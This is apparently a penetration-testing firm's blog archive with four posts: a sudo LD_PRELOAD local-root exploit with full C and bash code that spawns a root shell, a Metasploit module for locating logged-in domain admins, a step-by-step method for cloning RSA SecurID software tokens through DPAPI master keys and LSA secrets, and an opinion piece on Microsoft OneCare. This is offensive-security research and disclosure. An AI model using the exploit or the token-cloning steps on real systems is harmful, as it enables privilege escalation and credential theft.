
Wed, 28 Aug 2013

Something about sudo, Kingcope and re-inventing the wheel

Willems and I are currently on an internal assessment and have popped a couple hundred (thousand?) RHEL machines, which was trivial since they are all imaged. Anyhoo - long story short, we have a user which is allowed to use sudo for a few commands, such as reboot and service. I immediately thought it would be nice to turn this into a local root somehow. Service seemed promising and I had a look at how it works. Whilst it does sanitise the library path, it does not remove LD_PRELOAD. So if we could sneak LD_PRELOAD past sudo then all should be good?


For lack of deeper understanding I googled around the issue and came across http://www.catonmat.net/blog/simple-ld-preload-tutorial which is a vanilla LD_PRELOAD example overriding glibc's fopen() call. That sort of suited me well since I reckoned starting services will prolly read config files.


So after a little fiddling I came up with the following creature:



/* gcc -Wall -fPIC -shared -o myfopen.so myfopen.c */
/* http://www.catonmat.net/blog/simple-ld-preload-tutorial/ */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

FILE *fopen(const char *path, const char *mode) {
    printf("MAKE ME A SANDWICH\n");
    if (access("/tmp/sandwich", F_OK) != -1) {
        unlink("/tmp/sandwich");
        system("/bin/bash");
    }
    return NULL;
}

which could be invoked via



#!/bin/bash
touch /tmp/sandwich
sudo LD_PRELOAD=/home/george/Desktop/playground/ld_preload/myfopen.so /etc/init.d/ssh restart

Best thing was it sort of worked! Ugly but functioning...
While trying to work out the finer details, however, I came across a sploit Kingcope had written in 2008 which exploited exactly this issue! Apparently older sudos did not apply "Defaults env_reset", or were configured with "Defaults setenv", either of which makes the LD_PRELOAD trick possible. (This still applies to [mis]configurations which preserve the environment.)
As always with Kingcope sploits it is very elegant and definitely worth a look.
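For reference, the sudoers knobs involved look something like the sketch below. This is an illustrative fragment of a vulnerable versus a safe configuration, not a dump from the assessed boxes:

```
# vulnerable: the invoking user's environment is passed through to the
# command run via sudo, so LD_PRELOAD survives
Defaults !env_reset

# or, as in Kingcope's header, explicitly allow preserving the environment
Defaults setenv

# modern default: reset the environment, which strips LD_PRELOAD
# (and similar dangerous variables) before the command runs
Defaults env_reset
```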


On a side note: the header of his sploit says:



# http://www.exploit-db.com/exploits/7129/
#
#* Sudo <= 1.6.9p18 local r00t exploit
#* by Kingcope/2008/www.com-winner.com
#
# Most lame exploit EVER!
#
# Needs a special configuration in the sudoers file:
# --->>>>> "Defaults setenv" so environ vars are preserved :) <<<<<---
#
# May also need the current users password to be typed in
# So this exploit is UBERLAME!
# First Argument to this shell file: A program your current
# user is allowed to execute via sudo. sudo has to be in
# the path!!
# successfully tested on FreeBSD-7.0 and RedHat Linux
# I don't even know why I realease such stuffz
# I'M GONNA GRAB A COFFE NOW;HAVE PHUN !!!

so Kingcope considered the vuln UEBERLAME... I don't know whether I should be proud or sad for having found it five years later, then...
Anyhoo, at this point I was already pretty invested in the thing and decided to see the re-invention of the wheel through. Kingcope's shared object was a lot slicker than mine, hooking into _init() rather than fopen(), which makes it a lot more generic and elegant. He also used unsetenv("LD_PRELOAD") so the payload executes only once, which is likewise a lot more elegant.


So I shamelessly stole from his sploit... I don't see the need for a suid shell stager and fancy execls when a simple system() does the job, but I am prolly missing several points =) So without further waffle, here it is - it's called the sandwich sploit as a homage to the classic XKCD sudo comic.




#!/bin/bash
#
# old/misconfigured sudo local root
#
# disclosed by Kingcope in 2008
# http://www.exploit-db.com/exploits/7129/
#
# "re-discovered" in 2013 by
# george@sensepost.com
#

echo
echo "[!] $0 - sudo un-sanitised environment sploit"
echo "[!] usage: $0 <program to run via sudo> "
echo

cat > /tmp/sandwich.c << _EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

void _init()
{
    if (!geteuid())
    {
        unsetenv("LD_PRELOAD");
        setgid(0);
        setuid(0);
        unlink("/tmp/sandwich.so");
        unlink("/tmp/sandwich.c");
        system("/bin/bash");
    }
}
_EOF

gcc -fPIC -shared -o /tmp/sandwich.so /tmp/sandwich.c -nostartfiles
sudo LD_PRELOAD=/tmp/sandwich.so $1

Mon, 22 Apr 2013

Windows Domain Privilege Escalation : Implementing PSLoggedOn in Metasploit (+ a bonus history module)

There are multiple paths one could take to getting Domain Admin on a Microsoft Windows Active Directory domain. One common method is to start by finding a system where a privileged domain account, such as a domain admin, is logged in or has recently logged in. Once access to this system has been gained, you can either steal their security tokens (a la Incognito or pass-the-hash attacks) or query Digest Authentication (with Mimikatz/WCE) to get their clear-text password. The problem is finding out where these users are logged in.


I've often seen nmap and the smb-enum-sessions script (http://nmap.org/nsedoc/scripts/smb-enum-sessions.html) used to retrieve all the user sessions on the network. This (not very grep'pable) output is then grep'ed to find the hosts where our target user is logged in. The process of smb-enum-sessions and the subsequent analysis can be quite time consuming and clumsy. On a recent assessment, multiple tunnels in, where uploading nmap wasn't a great idea, we realised that there had to be a better way of doing this. While searching for an alternative solution we came across PsLoggedOn (SysInternals Suite) which, with a single binary, allows you to search the network for locations where a user is logged in. The downsides are that it doesn't cleanly run via psexec or other remote shells, you need a graphical logon to a system on the domain, and you need to upload another binary (the PsLoggedOn executable) to the target system. Examining how PsLoggedOn worked, we figured out that it was simply using the Windows NetSessionEnum API. Having a look at the API, I figured that it should be possible to write a simple post-exploitation module for Metasploit using Railgun.


After some trial and error, we now present enum_domain_user.rb, a simple Metasploit post-exploitation module capable of finding network sessions for a specific user. Below is a screenshot of the module in action.



To use the module,


1.) Download and copy it to:
<msfinstall>/modules/post/windows/gather/
(we'll send a pull request to metasploit-framework's github shortly).


2.) In MSF:
use post/windows/gather/enum_domain_user


3.) Set the USER and SESSION variables.


4.) Then simply run it with "exploit".


The module can also be used directly from meterpreter with:
run post/windows/gather/enum_domain_user USER=username


Warning: this doesn't seem to work with x64 meterpreter yet, most likely due to some memory pointer stuff I haven't worked out. Hopefully this will get updated shortly, or even better, one of you smart people out there can fix my horrible Ruby.

Bonus


As an added extra I've included a Metasploit history plugin. This plugin will simply allow you to view all the commands executed since the module was loaded and then execute them "bash style".


Typing "history" will give display the last 10 commands executed. If you wish to see more commands, type history <numberof entries>


To run a command from the history list type:
history !<command number>


Below is an action shot of the history module.



To install:


1.) Download and Copy history.rb to the plugins folder: <msf install>/plugins/
2.) In msfconsole type: load history
3.) For usage info type: help history


Both modules are available for download on Github, and I'll submit a pull request to metasploit-framework shortly. Please feel free to fork and be merry. Any updates/fixes/comments are welcome.
Github: https://github.com/sensepost/metasploit

Thu, 17 May 2012

A closer look into the RSA SecurID software token

Widespread use of smart phones by employees to perform work related activities has introduced the idea of using these devices as an authentication token. As an example of such attempts, RSA SecurID software tokens are available for iPhone, Nokia and the Windows platforms. Obviously, mobile phones would not be able to provide the level of tamper-resistance that hardware tokens would, but I was interested to know how easy/hard it could be for a potential attacker to clone RSA SecurID software tokens. I used the RSA SecurID Software Token for Microsoft Windows version 4.10 for my analysis and discovered the following issues:

Device serial number of tokens can be calculated by a remote attacker:

Every instance of the installed SecurID software token application contains a hard drive plug-in (implemented in tokenstoreplugin.dll) that has a unique device serial number. This serial number can be used for "Device Binding" and the RSA documentation defines it as follows:

“Before the software token is issued by RSA Authentication Manager, an additional extension attribute (<DeviceSerialNumber/>) can be added to the software token record to bind the software token to a specific device. The device serial number is used to bind a token to a specific device. If the same user installs the application on a different computer, the user cannot import software tokens into the application because the hard drive plug-in on the second computer has a different device serial number from the one to which the user's tokens are bound”.
Reverse engineering the hard drive plug-in (tokenstoreplugin.dll) indicated that the device serial number is dependent on the system's host name and the current user's Windows security identifier (SID). An attacker with access to these values can easily calculate the target token's device serial number and bypass the above-mentioned protection. Account SIDs can be enumerated in most Microsoft Active Directory based networks using publicly available tools, if the “enumeration of SAM accounts and shares” security setting was not set to disabled. Host names can be easily resolved using internal DNS or Microsoft RPC. The following figures show the device serial number generation code:

The SecurID device serial number calculation can be represented with the following formula:

device_serial_number = Left(SHA1(host_name + user_SID + "RSA Copyright 2008"), 10)
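Given that formula, the derivation can be sketched with standard tools. The host name and SID below are made-up placeholder values, and the exact input encoding (character set, terminators) is an assumption that would need to be confirmed against the binary:

```shell
#!/bin/sh
# Hypothetical re-implementation of the serial derivation described above.
# host_name and user_SID are invented example values, not real ones.
host_name="WORKSTATION01"
user_SID="S-1-5-21-1111111111-2222222222-3333333333-1001"

# Concatenate the inputs with the fixed copyright string, SHA1 them,
# and keep the first ten hex characters of the digest as the serial.
printf '%s%s%s' "$host_name" "$user_SID" "RSA Copyright 2008" \
  | sha1sum | awk '{print substr($1, 1, 10)}'
```

Here Left(x, 10) is taken to mean the first ten hex characters of the digest, which matches the ten-character serial shown in the disassembly figures.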

Token's copy protection:

The software token information, including the secret seed value, is stored in a SQLite version 3 database file named RSASecurIDStorage under the “%USERPROFILE%\Local Settings\Application Data\RSA\RSA SecurID Software Token Library” directory. This file can be viewed by any SQLite database browser, but sensitive information such as the checksum and seed values are encrypted. RSA documentation states that this database file is both encrypted and copy protected: “RSA SecurID Software Token for Windows uses the following data protection mechanisms to tie the token database to a specific computer:

• Binding the database to the computer's primary hard disk drive

• Implementing the Windows Data Protection API (DPAPI)

These mechanisms ensure that an intruder cannot move the token database to another computer and access the tokens. Even if you disable copy protection, the database is still protected by DPAPI.”

The RSASecurIDStorage database file has two tables: PROPERTIES and TOKENS. The DatabaseKey and CryptoChecksum rows found in the PROPERTIES table were found to be used for copy protection purposes, as shown in the figure below:

Reverse engineering of the copy protection mechanism indicated that:

  • The CryptoChecksum value is encrypted using the machine's master key, which can only be decrypted on the same computer system, unless the attacker can find a way to import the machine key and other supporting data to their machine.
  • The DatabaseKey is encrypted using the current logged-on user's master key and provides token binding to that user account.
Previous research on the Microsoft Windows DPAPI internals has made offline decryption of the DPAPI protected data possible. This means that if the attacker was able to copy the RSA token database file along with the encryption master keys to their system (for instance by infecting a victim's machine with a rootkit), then it would be possible to decrypt the token database file on their machine. The detailed attack steps to clone a SecurID software token by copying the token database file from a victim's system are as follows:
  1. Copy the token database file, RSASecurIDStorage, from the user profile directory
  2. Copy the user's master key from %PROFILEDIR%\Application Data\Microsoft\Protect\%SID%; the current master key's GUID can be read from Preferred file as shown in the figure below:
  3. Copy the machine's master key from the %WINDIR%\system32\Microsoft\Protect\ directory. Microsoft Windows protects machine keys against tampering by using SHA1 hash values, which are stored and handled by the Local Security Authority Subsystem Service (LSASS) process in Microsoft Windows operating systems. The attacker should also dump these hash values from LSA using publicly available tools like lsadump.
  4. Having all the required master keys and the token database file, install and deploy a Windows machine and change the machine and user SIDs to the victim's system SID by using an available tool such as NewSID.
  5. Overwrite the token database file and the user and machine master keys with the ones copied from the victim's system. You would also need to find a way to update the DPAPI_SYSTEM value in the LSA secrets of the Windows machine. Currently, this is the only challenge that I was not able to solve, but it should be possible to write a tool similar to lsadump which updates LSA secrets.
  6. When the above has been performed, you should have successfully cloned the victim's software token and if they run the SecurID software token program on your computer, it will generate the exact same random numbers that are displayed on the victim's token.
In order to demonstrate the possibility of the above-mentioned attack, I installed and activated token A and token B on two separate Windows XP virtual machines and attempted to clone token B on the virtual machine that was running token A. Taking the above steps, token B was successfully cloned on the machine running token A, as shown in the following figures:

In order to counter the aforementioned issues, I would recommend the use of trusted platform module (TPM) binding, which associates the software token with the TPM chip on the system (a TPM chip for mobiles? there are vendors working on it).

Wed, 11 Jul 2007

Have a (one) care sir....

Someone in the office was discussing Microsoft's recent horrible foray into the anti-virus market. Apparently an online source held OneCare as faring worse than a simple man with a perl script. A quick scan shows that they have indeed fared pretty poorly in independent tests:

"(BBC News) OneCare was the only failure among 17 anti-virus programs tested by the AV Comparatives organisation."

Now the obvious question was: How could Microsoft possibly get it so wrong? (Cue the drum roll, bring out your tin foil hats)

You have fewer people running around these days screaming "Microsoft just don't get security" (compare a BlackHat today with a BlackHat 5 years ago, where Microsoft employees hid their name badges more than any of the guys from 3-letter agencies did). There is little doubt that they have skilled engineers and that they quickly step up when they have to. So how is it possible that they can do this badly in a new market they were keen to enter?

There are probably good reasons for it, but since I do have a shiny new tin foil hat, I'm going to run with a different ponderation. Microsoft knew they were going to take heat for PatchGuard (preventing 3rd parties from hooking into the kernel). They had to know that the Symantecs and McAfees of the world would be up in arms about the fact that this would give Microsoft an unfair advantage in this space. This would affect not just their AV lines, but also the HIPS products that Microsoft would surely want to bundle with the OS in the future.

Of course, Microsoft's biggest defense was to claim that their engineers were not given access to Windows internals where their product competed with 3rd parties. Almost all of us responded with: "riiiiiiiigghtt...."

But then... Microsoft releases OneCare, and it really _does_ do poorly against its industry peers! Surely if OneCare engineers had preferred treatment they would have done better? Surely this proves that they were honest all along? From an MSFT point of view, it would be giving up fairly little (a market they have not yet come to rely on) to gain favour in markets where they do indeed have a lot to lose... all in all, it would make an excellent sacrificial lamb.